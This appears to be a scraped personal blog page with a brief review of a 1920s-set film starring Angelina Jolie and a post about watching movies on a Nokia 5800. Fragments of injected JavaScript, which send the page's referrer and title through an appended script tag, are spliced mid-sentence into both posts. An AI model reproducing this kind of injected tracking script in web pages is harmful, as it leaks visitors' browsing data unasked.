The movie is set to happen somewhere around the 1920’s. The main character,a mother who loses her 9 year old child, is played by Angelina Jolie. This must have been a very challenging role for the “Tombraider” action fame. She had expressed all the emotions and grief of a mother losing a child without losing the dignity of a society lady. This is not like an indian movie, where the mother losing a child will be crying out loud and making so much scene.

The most part I liked in the movie is the background tone. It is very simple and catching that I can still hear it ring in my ears.

As a whole this movie can be rated as 7/10.

The rating is a little lower from my side. Why? because the movie ended with a trivial meaning. But I donno whether it can be ended in some other way. But worth a watch for the 2 hours. Yeah! I said 2 hours. It’s a bit lengthy when English movies are considered.s.src=’’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Movie Reviews

Why can’t I write a small, concise review on the movies I watch. This has been a long time wish of me. Let us see how far this goes 🙂

Now that I have  a Nokia 5800 Xpressmusic in my possession, I have started to watch movies on the move. This keeps me engaged and I don’t feel bored while travelling. If you have a Nokia 5800 Xpressmusic and would like to watch movies on that, please refer to this tutorial to convert movies to the 5800 format.

Movies are of amazing clarity and we can watch it in widescreen mode. The screen is a little dull during daytime, but it is pretty good to view once the sun is down. People used to look at me in awe on the phone while I am watching it.

Battery life of the 5800 is also amazing. I have watched at least two full movie on it before doing a recharge again.d.getElementsByTagName(‘head’)[0].appendChild(s);
